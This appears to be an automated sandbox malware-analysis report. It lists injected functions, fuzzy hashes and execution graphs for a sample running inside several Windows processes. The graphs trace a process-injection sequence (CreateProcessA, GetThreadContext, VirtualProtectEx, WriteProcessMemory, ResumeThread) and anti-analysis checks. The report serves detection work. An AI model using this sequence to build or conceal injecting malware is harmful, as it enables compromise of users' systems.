                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2966204226.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 11 a50811-a50846 call a5086e 14 a508ad-a508ae 11->14 15 a50848-a50851 11->15 16 a508af-a508b0 14->16 15->16 17 a50853-a5085c 15->17 18 a508b9-a508cc call a51756 call a51e62 16->18 19 a508d0 17->19 20 a5085e 17->20 24 a508d4 call a508d9 18->24 19->24 21 a508c5-a508cc 20->21 22 a50860-a50861 20->22 21->19 22->18 26 a50863 22->26 28 a50866-a5086f 26->28 29 a508d9-a50906 call a50cc4 call a514bc call a50643 call a50ce8 26->29 32 a50871-a50897 28->32 33 a5089e-a508a4 28->33 44 a5090b-a5090f 29->44 32->33 33->14 45 a50939 call a5093e 44->45
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.2966204226.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:67
                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                          execution_graph 2536 d408d9 2542 d40cc4 2536->2542 2538 d408e5 2545 d40643 2538->2545 2540 d408ef 2553 d4093e 2540->2553 2560 d40c3f GetPEB 2542->2560 2544 d40cc9 2544->2538 2546 d40660 2545->2546 2562 d4067c 2546->2562 2548 d40673 2568 d406c2 2548->2568 2550 d4080f 2550->2540 2551 d406b9 2551->2550 2572 d40811 2551->2572 2554 d40cc4 GetPEB 2553->2554 2556 d4094a 2554->2556 2555 d40af1 2555->2540 2556->2555 2589 d409d9 2556->2589 2559 d409d2 2559->2555 2593 d40af3 2559->2593 2561 d40c4b 2560->2561 2561->2544 2561->2561 2563 d40681 2562->2563 2564 d406c2 GetPEB 2563->2564 2566 d406b9 2564->2566 2565 d4080f 2565->2548 2566->2565 2567 d40811 GetPEB 2566->2567 2567->2565 2569 d406c7 2568->2569 2570 d4080f 2569->2570 2571 d40811 GetPEB 2569->2571 2570->2551 2571->2570 2573 d40840 2572->2573 2574 d40863 2573->2574 2576 d408b9 2573->2576 2577 d40866 2573->2577 2574->2577 2578 d40cc4 GetPEB 2574->2578 2583 d408d9 2576->2583 2577->2550 2579 d408e5 2578->2579 2580 d40643 GetPEB 2579->2580 2581 d408ef 2580->2581 2582 d4093e GetPEB 2581->2582 2582->2581 2584 d40cc4 GetPEB 2583->2584 2585 d408e5 2584->2585 2586 d40643 GetPEB 2585->2586 2587 d408ef 2586->2587 2588 d4093e GetPEB 2587->2588 2588->2587 2592 d409de 2589->2592 2590 d40af3 GetPEB 2591 d40af1 2590->2591 2591->2559 2592->2590 2592->2591 2595 d40b01 2593->2595 2596 d40cc4 GetPEB 2595->2596 2597 d40b0d 2596->2597 2602 d40b27 2597->2602 2599 d40b20 2606 d40b65 2599->2606 2603 d40b2c 2602->2603 2604 d40b65 GetPEB 2603->2604 2605 d40b57 2603->2605 2604->2605 2605->2599 2610 d40b6a 2606->2610 2612 d408b3 2610->2612 2613 d408b9 2612->2613 2614 d408d9 GetPEB 2613->2614 2614->2613 2615 d40b6b 2616 d40b7d 2615->2616 2617 d408b3 GetPEB 2616->2617 2618 d40bb1 2617->2618 2619 d40c3f GetPEB 2618->2619 2620 d40bb6 2619->2620

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00D40811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2966201705.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:70
                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                          execution_graph 2603 b508d9 2609 b50cc4 2603->2609 2605 b508e5 2612 b50643 2605->2612 2607 b508ef 2620 b5093e 2607->2620 2627 b50c3f GetPEB 2609->2627 2611 b50cc9 2611->2605 2613 b50660 2612->2613 2629 b5067c 2613->2629 2615 b50673 2635 b506c2 2615->2635 2617 b5080f 2617->2607 2618 b506b9 2618->2617 2639 b50811 2618->2639 2621 b50cc4 GetPEB 2620->2621 2623 b5094a 2621->2623 2622 b50af1 2622->2607 2623->2622 2659 b509d9 2623->2659 2626 b509d2 2626->2622 2663 b50af3 2626->2663 2628 b50c4b 2627->2628 2628->2611 2628->2628 2630 b50681 2629->2630 2631 b506c2 GetPEB 2630->2631 2633 b506b9 2631->2633 2632 b5080f 2632->2615 2633->2632 2634 b50811 GetPEB 2633->2634 2634->2632 2636 b506c7 2635->2636 2637 b5080f 2636->2637 2638 b50811 GetPEB 2636->2638 2637->2618 2638->2637 2650 b5086e 2639->2650 2641 b50840 2643 b508d9 2641->2643 2645 b50866 2641->2645 2644 b50cc4 GetPEB 2643->2644 2646 b508e5 2644->2646 2645->2617 2653 b508d9 2645->2653 2647 b50643 GetPEB 2646->2647 2648 b508ef 2647->2648 2649 b5093e GetPEB 2648->2649 2649->2648 2651 b50873 2650->2651 2651->2641 2652 b508d9 GetPEB 2651->2652 2652->2651 2654 b50cc4 GetPEB 2653->2654 2655 b508e5 2654->2655 2656 b50643 GetPEB 2655->2656 2657 b508ef 2656->2657 2658 b5093e GetPEB 2657->2658 2658->2657 2662 b509de 2659->2662 2660 b50af3 GetPEB 2661 b50af1 2660->2661 2661->2626 2662->2660 2662->2661 2665 b50b01 2663->2665 2666 b50cc4 GetPEB 2665->2666 2667 b50b0d 2666->2667 2672 b50b27 2667->2672 2669 b50b20 2671 b50b57 2669->2671 2676 b50b65 2669->2676 2673 b50b2c 2672->2673 2674 b50b65 GetPEB 2673->2674 2675 b50b57 2674->2675 2675->2669 2680 b50b6a 2676->2680 2682 b508b3 2680->2682 2683 b508b9 2682->2683 2684 b508d9 GetPEB 2683->2684 2684->2683 2685 b50b6b 2687 b50b7d 2685->2687 2686 b508b3 GetPEB 2688 b50bb1 2686->2688 2687->2686 2689 b50c3f GetPEB 2688->2689 2690 b50bb6 2689->2690

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00B50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000009.00000002.2968349983.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:7.1%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:80
                                                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                                                          execution_graph 2609 1108d9 2617 110cc4 2609->2617 2611 1108e5 2620 110643 2611->2620 2613 110939 2628 11093e 2613->2628 2615 1108ef 2615->2613 2616 11091f SleepEx RtlExitUserThread 2615->2616 2616->2613 2635 110c3f GetPEB 2617->2635 2619 110cc9 2619->2611 2621 110660 2620->2621 2637 11067c 2621->2637 2623 110673 2643 1106c2 2623->2643 2625 11080f 2625->2615 2626 1106b9 2626->2625 2647 110811 2626->2647 2629 110cc4 GetPEB 2628->2629 2631 11094a 2629->2631 2630 110af1 2630->2613 2631->2630 2667 1109d9 2631->2667 2634 1109d2 2634->2630 2671 110af3 2634->2671 2636 110c4b 2635->2636 2636->2619 2636->2636 2638 110681 2637->2638 2639 1106c2 7 API calls 2638->2639 2641 1106b9 2639->2641 2640 11080f 2640->2623 2641->2640 2642 110811 7 API calls 2641->2642 2642->2640 2644 1106c7 2643->2644 2645 11080f 2644->2645 2646 110811 7 API calls 2644->2646 2645->2626 2646->2645 2649 110840 2647->2649 2648 110863 2651 110866 2648->2651 2652 110cc4 GetPEB 2648->2652 2649->2648 2649->2651 2659 1108d9 2649->2659 2651->2625 2653 1108e5 2652->2653 2654 110643 5 API calls 2653->2654 2657 1108ef 2654->2657 2655 110939 2656 11093e 5 API calls 2655->2656 2656->2655 2657->2655 2658 11091f SleepEx RtlExitUserThread 2657->2658 2658->2655 2660 110cc4 GetPEB 2659->2660 2661 1108e5 2660->2661 2662 110643 5 API calls 2661->2662 2665 1108ef 2662->2665 2663 110939 2664 11093e 5 API calls 2663->2664 2664->2663 2665->2663 2666 11091f SleepEx RtlExitUserThread 2665->2666 2666->2663 2668 1109de 2667->2668 2669 110af3 7 API calls 2668->2669 2670 110af1 2668->2670 2669->2670 2670->2634 2673 110b01 2671->2673 2674 110cc4 GetPEB 2673->2674 2675 110b0d 2674->2675 2680 110b27 2675->2680 2677 110b20 2684 110b65 2677->2684 2681 110b2c 2680->2681 2682 110b65 7 API calls 2681->2682 2683 110b57 2681->2683 2682->2683 2683->2677 2688 110b6a 2684->2688 2690 1108b3 2688->2690 2691 1108b9 2690->2691 2692 1108d9 5 API calls 2691->2692 2693 1108d5 2692->2693 2694 110cc4 GetPEB 2693->2694 2695 1108e5 2694->2695 2696 110643 5 API calls 2695->2696 2699 1108ef 2696->2699 2697 110939 2698 11093e 5 API calls 2697->2698 2698->2697 2699->2697 2700 11091f SleepEx RtlExitUserThread 2699->2700 2700->2697 2701 110b6b 2702 110b7d 2701->2702 2703 1108b3 7 API calls 2702->2703 2704 110bb1 2703->2704 2705 110c3f GetPEB 2704->2705 2706 110bb6 2705->2706

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00110811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2966275898.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:31.4%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:462
                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                          execution_graph 5761 1c495d 5762 1c4970 5761->5762 5763 1c49ae CreateEventA 5762->5763 5764 1c4a63 5762->5764 5765 1c49d1 5763->5765 5765->5764 5766 1c4d53 WaitForSingleObject 5765->5766 5766->5765 5899 1c3e9e 5900 1c3ea1 5899->5900 5903 1c3ec3 5900->5903 5904 1c3653 5903->5904 5905 1c3ec8 LoadLibraryA 5904->5905 5906 1c3eee 5905->5906 5908 1c3ed2 5905->5908 5907 1c3f0d 7 API calls 5906->5907 5911 1c3f03 5907->5911 5909 1c409a 3 API calls 5908->5909 5910 1c3ebd 5909->5910 5912 1c3f3b 5911->5912 5913 1c3f2b GetModuleHandleA 5911->5913 5915 1c3f46 Sleep 5912->5915 5914 1c401b 3 API calls 5913->5914 5916 1c3f39 5914->5916 5917 1c3f78 5915->5917 5916->5910 5918 1c3f56 Sleep 5917->5918 5919 1c3f78 5918->5919 5920 1c3f66 Sleep 5919->5920 5920->5910 5920->5916 5921 22438a7 5922 22438ac 5921->5922 5925 22438f2 5922->5925 5929 224260c 5925->5929 5930 224261a 5929->5930 5600 860000 VirtualProtect 5601 86034e 5600->5601 5602 8606d0 VirtualProtect 5601->5602 5603 860528 VirtualProtect 5601->5603 5603->5601 5931 1c3e9a 5932 1c3653 5931->5932 5933 1c3e9f GetProcAddress 5932->5933 5934 1c3eaa 5933->5934 5935 1c3ed4 5933->5935 5936 1c3ebd 5934->5936 5937 1c3ec3 12 API calls 5934->5937 5938 1c409a 3 API calls 5935->5938 5937->5936 5939 1c3ee9 5938->5939 5646 2243f2c 5647 2243f31 5646->5647 5656 2243f5d 5646->5656 5648 2243f5f 5647->5648 5649 2243f4f GetModuleHandleA 5647->5649 5651 2243f6a Sleep 5648->5651 5657 224403f 5649->5657 5652 2243f9c 5651->5652 5653 2243f7a Sleep 5652->5653 5654 2243f9c 5653->5654 5655 2243f8a Sleep 5654->5655 5655->5656 5659 2244052 5657->5659 5658 22440ba 5658->5656 5659->5658 5661 22440be 5659->5661 5666 22439d7 RtlInitializeCriticalSection 5661->5666 5665 22440c8 5665->5658 5667 22439e7 VirtualAlloc 5666->5667 5667->5667 5668 22439ff 5667->5668 5669 224382b VirtualAlloc 5668->5669 5669->5669 5670 2243843 CreateThread 5669->5670 5670->5665 5771 2243d6a 5772 2243d6f 5771->5772 5773 22439d7 2 API calls 5772->5773 5774 2243d8a 5773->5774 5775 224382b 2 API calls 5774->5775 5776 2243d8f 5775->5776 5671 2243f31 5672 2243f36 5671->5672 5673 2243f5f 5672->5673 5674 2243f4f GetModuleHandleA 5672->5674 5677 2243f6a Sleep 5673->5677 5675 224403f 4 API calls 5674->5675 5676 2243f5d 5675->5676 5678 2243f9c 5677->5678 5679 2243f7a Sleep 5678->5679 5680 2243f9c 5679->5680 5681 2243f8a Sleep 5680->5681 5681->5676 5777 1c3d46 5778 1c3653 5777->5778 5779 1c3d4b LoadLibraryA 5778->5779 5780 1c3d61 5779->5780 5798 1c3d86 5780->5798 5783 1c3da1 5784 1c1345 3 API calls 5783->5784 5785 1c3dba 5784->5785 5786 1c1345 3 API calls 5785->5786 5787 1c3dd3 5786->5787 5788 1c1345 3 API calls 5787->5788 5789 1c3dec 5788->5789 5790 1c1345 3 API calls 5789->5790 5791 1c3e05 5790->5791 5792 1c1345 3 API calls 5791->5792 5793 1c3e1e 5792->5793 5794 1c1345 3 API calls 5793->5794 5795 1c3e37 5794->5795 5796 1c1345 3 API calls 5795->5796 5797 1c3e50 5796->5797 5799 1c3653 5798->5799 5800 1c3d8b LoadLibraryA 5799->5800 5801 1c3da1 5800->5801 5802 1c1345 3 API calls 5801->5802 5803 1c3dba 5802->5803 5804 1c1345 3 API calls 5803->5804 5805 1c3dd3 5804->5805 5806 1c1345 3 API calls 5805->5806 5807 1c3dec 5806->5807 5808 1c1345 3 API calls 5807->5808 5809 1c3e05 5808->5809 5810 1c1345 3 API calls 5809->5810 5811 1c3e1e 5810->5811 5812 1c1345 3 API calls 5811->5812 5813 1c3e37 5812->5813 5814 1c1345 3 API calls 5813->5814 5815 1c3d7e LoadLibraryA 5814->5815 5815->5783 5976 1c34c6 lstrlen 5979 1c276c 5976->5979 5978 1c34df VirtualFree CloseHandle 5980 1c277d 5979->5980 5980->5978 5981 1c31c6 5982 1c31cb 5981->5982 5983 1c31e9 lstrcat 5982->5983 5984 1c31f6 5983->5984 5985 1c321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 5984->5985 5986 1c3276 5984->5986 5985->5986 5604 1c3ec3 5605 1c3653 5604->5605 5606 1c3ec8 LoadLibraryA 5605->5606 5607 1c3eee 5606->5607 5609 1c3ed2 5606->5609 5622 1c3f0d 5607->5622 5634 1c409a 5609->5634 5611 1c3ee9 5612 1c3f03 5613 1c3f3b 5612->5613 5614 1c3f2b GetModuleHandleA 5612->5614 5616 1c3f46 Sleep 5613->5616 5642 1c401b 5614->5642 5618 1c3f78 5616->5618 5617 1c3f39 5617->5611 5619 1c3f56 Sleep 5618->5619 5620 1c3f78 5619->5620 5621 1c3f66 Sleep 5620->5621 5621->5611 5621->5617 5623 1c3f12 5622->5623 5624 1c3f3b 5623->5624 5625 1c3f2b GetModuleHandleA 5623->5625 5627 1c3f46 Sleep 5624->5627 5626 1c401b 3 API calls 5625->5626 5628 1c3f39 5626->5628 5629 1c3f78 5627->5629 5630 1c3f76 5628->5630 5631 1c3f56 Sleep 5629->5631 5630->5612 5632 1c3f78 5631->5632 5633 1c3f66 Sleep 5632->5633 5633->5628 5633->5630 5635 1c409f 5634->5635 5636 1c1345 3 API calls 5635->5636 5637 1c40bd 5636->5637 5638 1c1345 3 API calls 5637->5638 5639 1c40d6 5638->5639 5640 1c1345 3 API calls 5639->5640 5641 1c40ef 5640->5641 5641->5611 5644 1c402e 5642->5644 5643 1c4096 5643->5617 5644->5643 5645 1c409a 3 API calls 5644->5645 5645->5643 5940 1c3883 5941 1c3888 5940->5941 5944 1c38ce 5941->5944 5943 1c3894 5948 1c25e8 5944->5948 5946 1c38e8 lstrcat 5947 1c38fe 5946->5947 5947->5943 5949 1c25f6 5948->5949 5949->5946 5309 1c093e 5330 1c0cc4 5309->5330 5311 1c094a 5333 1c14bc 5311->5333 5313 1c094f 5314 1c0954 Sleep RtlExitUserThread OpenMutexA 5313->5314 5315 1c098f GetStartupInfoA 5314->5315 5316 1c0af1 5314->5316 5348 1c09d9 5315->5348 5318 1c09d2 5319 1c0a3d DuplicateHandle 5318->5319 5322 1c0a3c 5318->5322 5327 1c09de CreateProcessA 5318->5327 5320 1c0aec 5319->5320 5321 1c0a82 WriteProcessMemory 5319->5321 5362 1c0af3 5320->5362 5321->5320 5323 1c0ab0 ResumeThread 5321->5323 5322->5319 5325 1c0ac1 Sleep OpenMutexA 5323->5325 5325->5316 5326 1c0ae7 5325->5326 5326->5320 5326->5325 5327->5320 5328 1c09ee GetThreadContext 5327->5328 5328->5320 5329 1c0a16 VirtualProtectEx 5328->5329 5329->5320 5329->5322 5364 1c0c3f GetPEB 5330->5364 5332 1c0cc9 5332->5311 5366 1c14de 5333->5366 5337 1c14d8 5380 1c1345 5337->5380 5338 1c1345 3 API calls 5339 1c152b 5338->5339 5340 1c1345 3 API calls 5339->5340 5341 1c1544 5340->5341 5342 1c1345 3 API calls 5341->5342 5343 1c155d 5342->5343 5344 1c1345 3 API calls 5343->5344 5345 1c1576 5344->5345 5346 1c1345 3 API calls 5345->5346 5347 1c158f 5346->5347 5347->5313 5387 1c3653 5348->5387 5350 1c09de CreateProcessA 5351 1c0aec 5350->5351 5352 1c09ee GetThreadContext 5350->5352 5353 1c0af3 21 API calls 5351->5353 5352->5351 5354 1c0a16 VirtualProtectEx 5352->5354 5355 1c0af1 5353->5355 5354->5351 5356 1c0a3c DuplicateHandle 5354->5356 5355->5318 5356->5351 5358 1c0a82 WriteProcessMemory 5356->5358 5358->5351 5359 1c0ab0 ResumeThread 5358->5359 5360 1c0ac1 Sleep OpenMutexA 5359->5360 5360->5355 5361 1c0ae7 5360->5361 5361->5351 5361->5360 5389 1c0b01 5362->5389 5365 1c0c4b 5364->5365 5365->5332 5365->5365 5367 1c14e3 5366->5367 5368 1c1345 3 API calls 5367->5368 5369 1c1512 5368->5369 5370 1c1345 3 API calls 5369->5370 5371 1c152b 5370->5371 5372 1c1345 3 API calls 5371->5372 5373 1c1544 5372->5373 5374 1c1345 3 API calls 5373->5374 5375 1c155d 5374->5375 5376 1c1345 3 API calls 5375->5376 5377 1c1576 5376->5377 5378 1c1345 3 API calls 5377->5378 5379 1c158f 5378->5379 5379->5337 5381 1c1358 5380->5381 5382 1c13eb 5380->5382 5381->5382 5383 1c1364 VirtualProtect 5381->5383 5382->5338 5383->5382 5384 1c137c VirtualAlloc 5383->5384 5384->5384 5385 1c1391 5384->5385 5386 1c13ad VirtualProtect 5385->5386 5386->5382 5388 1c3665 5387->5388 5388->5350 5388->5388 5390 1c0cc4 GetPEB 5389->5390 5391 1c0b0d 5390->5391 5396 1c0b27 5391->5396 5393 1c0b20 5402 1c0b65 5393->5402 5397 1c3653 5396->5397 5398 1c0b2c LoadLibraryA 5397->5398 5399 1c0b42 5398->5399 5400 1c0b65 28 API calls 5399->5400 5401 1c0b57 5399->5401 5400->5401 5401->5393 5403 1c3653 5402->5403 5404 1c0b6a FindWindowA 5403->5404 5405 1c0bac 5404->5405 5406 1c0b74 GetWindowThreadProcessId OpenProcess 5404->5406 5413 1c08b3 5405->5413 5406->5405 5408 1c0b8e 5406->5408 5408->5405 5411 1c0ba4 ExitProcess 5408->5411 5416 1c08b9 5413->5416 5424 1c08d9 5416->5424 5425 1c0cc4 GetPEB 5424->5425 5426 1c08e5 5425->5426 5427 1c14bc 3 API calls 5426->5427 5428 1c08ea 5427->5428 5432 1c0643 5428->5432 5431 1c08ef 5440 1c093e 5431->5440 5433 1c0660 5432->5433 5461 1c067c 5433->5461 5435 1c0673 5467 1c06c2 5435->5467 5437 1c080f 5437->5431 5438 1c06b9 5438->5437 5471 1c0811 5438->5471 5441 1c0cc4 GetPEB 5440->5441 5442 1c094a 5441->5442 5443 1c14bc 3 API calls 5442->5443 5444 1c094f 5443->5444 5445 1c0954 Sleep RtlExitUserThread OpenMutexA 5444->5445 5446 1c098f GetStartupInfoA 5445->5446 5447 1c0af1 5445->5447 5448 1c09d9 17 API calls 5446->5448 5447->5431 5449 1c09d2 5448->5449 5450 1c0a3d DuplicateHandle 5449->5450 5453 1c0a3c 5449->5453 5458 1c09de CreateProcessA 5449->5458 5451 1c0aec 5450->5451 5452 1c0a82 WriteProcessMemory 5450->5452 5455 1c0af3 17 API calls 5451->5455 5452->5451 5454 1c0ab0 ResumeThread 5452->5454 5453->5450 5456 1c0ac1 Sleep OpenMutexA 5454->5456 5455->5447 5456->5447 5457 1c0ae7 5456->5457 5457->5451 5457->5456 5458->5451 5459 1c09ee GetThreadContext 5458->5459 5459->5451 5460 1c0a16 VirtualProtectEx 5459->5460 5460->5451 5460->5453 5462 1c0681 5461->5462 5463 1c06c2 29 API calls 5462->5463 5465 1c06b9 5463->5465 5464 1c080f 5464->5435 5465->5464 5466 1c0811 29 API calls 5465->5466 5466->5464 5469 1c06c7 5467->5469 5468 1c080f 5468->5438 5469->5468 5470 1c0811 29 API calls 5469->5470 5470->5468 5472 1c0840 5471->5472 5473 1c0863 5472->5473 5474 1c08d9 29 API calls 5472->5474 5475 1c0866 5472->5475 5473->5475 5476 1c0cc4 GetPEB 5473->5476 5474->5473 5475->5437 5477 1c08e5 5476->5477 5478 1c14bc 3 API calls 5477->5478 5479 1c08ea 5478->5479 5480 1c0643 29 API calls 5479->5480 5482 1c08ef 5480->5482 5481 1c093e 29 API calls 5481->5482 5482->5481 5682 1c2f3f 5683 1c2f44 5682->5683 5684 1c2f4a lstrlen 5683->5684 5685 1c2f61 5684->5685 5483 2240000 5485 2240005 5483->5485 5500 2240ce8 5485->5500 5487 2240011 5503 22433ca 5487->5503 5489 2240016 5507 224098b OpenMutexA 5489->5507 5492 224038f 5493 224002e 5493->5492 5494 2240697 5493->5494 5523 22406a0 5493->5523 5529 22406e6 5494->5529 5497 2240833 5498 22406dd 5498->5497 5533 2240835 5498->5533 5541 2240c63 GetPEB 5500->5541 5502 2240ced 5502->5487 5504 22433ea 5503->5504 5543 2243409 GetVolumeInformationA 5504->5543 5506 2243405 5506->5489 5508 224001b ExitProcess 5507->5508 5509 22409b3 GetStartupInfoA 5507->5509 5508->5493 5545 22409fd 5509->5545 5511 2240a60 5511->5508 5512 22409f6 5512->5511 5513 2240a02 CreateProcessA 5512->5513 5514 2240b10 5513->5514 5515 2240a12 GetThreadContext 5513->5515 5514->5508 5558 2240b17 5514->5558 5515->5514 5517 2240a3a VirtualProtectEx 5515->5517 5517->5514 5518 2240a65 DuplicateHandle 5517->5518 5518->5514 5519 2240aa6 WriteProcessMemory 5518->5519 5519->5514 5520 2240ad4 ResumeThread 5519->5520 5521 2240ae5 Sleep OpenMutexA 5520->5521 5521->5508 5522 2240b0b 5521->5522 5522->5514 5522->5521 5524 22406a5 5523->5524 5525 22406e6 3 API calls 5524->5525 5527 22406dd 5525->5527 5526 2240833 5526->5494 5527->5526 5528 2240835 3 API calls 5527->5528 5528->5526 5531 22406eb 5529->5531 5530 2240833 5530->5498 5531->5530 5532 2240835 3 API calls 5531->5532 5532->5530 5535 2240864 5533->5535 5534 224088a 5534->5497 5535->5534 5536 22408fd 3 API calls 5535->5536 5537 2240887 5535->5537 5536->5537 5537->5534 5538 2240ce8 GetPEB 5537->5538 5540 2240909 5538->5540 5539 2240962 3 API calls 5539->5540 5540->5539 5542 2240c6f 5541->5542 5542->5502 5542->5542 5544 224342b 5543->5544 5544->5506 5560 2243677 5545->5560 5547 2240a02 CreateProcessA 5548 2240b10 5547->5548 5549 2240a12 GetThreadContext 5547->5549 5550 2240b15 5548->5550 5551 2240b17 6 API calls 5548->5551 5549->5548 5552 2240a3a VirtualProtectEx 5549->5552 5550->5512 5551->5550 5552->5548 5553 2240a65 DuplicateHandle 5552->5553 5553->5548 5554 2240aa6 